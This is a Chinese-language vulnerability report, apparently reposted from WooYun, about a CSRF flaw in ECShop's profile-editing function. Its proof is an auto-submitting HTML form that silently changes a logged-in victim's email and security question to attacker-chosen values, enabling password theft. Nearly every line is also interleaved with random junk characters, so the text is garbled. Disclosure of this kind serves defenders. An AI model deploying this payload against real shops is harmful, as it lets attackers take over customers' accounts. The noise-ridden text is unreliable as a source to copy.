简要描述:
6 z2 |) Z6 a! x7 \, F( [ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现& C& Y' ]4 ?* v9 ~2 X
7 T5 Q2 Z! T3 ]4 ?Demo For:http://www.wooyun.org/bug.php?action=view&id=395
9 m0 S) Z# t2 n$ s" H6 |1 O2 | d9 ]: }
4 }. \: Q. R: R G: G1 G" d' g详细说明:/ O {! Z$ O5 M' q
利用csrf和xss可以突破官方所说的“障碍”) m4 o* P; ^$ E. r& m- ^
xss版本已经有人说明
) c8 Q# _4 z) k* R; w这里给出csrf版本
) d1 H2 d3 n G9 {, x2 `- ^4 R* h/ V* L. l7 }! t+ M% t
漏洞证明:
/ J& K4 x6 z( H5 i" a) Z9 C<html>: r; `( e& q2 {; @1 t" g/ Y
<body>9 Z, c% i! K4 F6 Z4 a$ F1 J* {: C
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">" O- i' u4 x4 O. v; m! Y
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 t) C7 T0 _3 i' g" y<INPUT TYPE="text" NAME="act" value="act_edit_profile">" Z- d; U9 j4 o$ X, ?4 X+ }* c
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
5 {: S7 Y4 h+ h1 X; I: Z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">% F( \& e! b: @) A' k' W; X
</body>
9 V, F5 o% s, ^6 `5 _7 Q u<script>
' N' d" D. t- j* p, P9 c. I9 o. d1 rdocument.forms[0].submit();
V. e$ D# s8 n) x</script>
9 `, ~: q9 V# i5 f</html>
% d0 V+ Y+ w. H1 H4 |& a$ X5 f6 ?% Q构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失$ Z/ ^5 `* e1 T1 q) l5 N
" |; w, A9 Q! b( U0 E1 m
|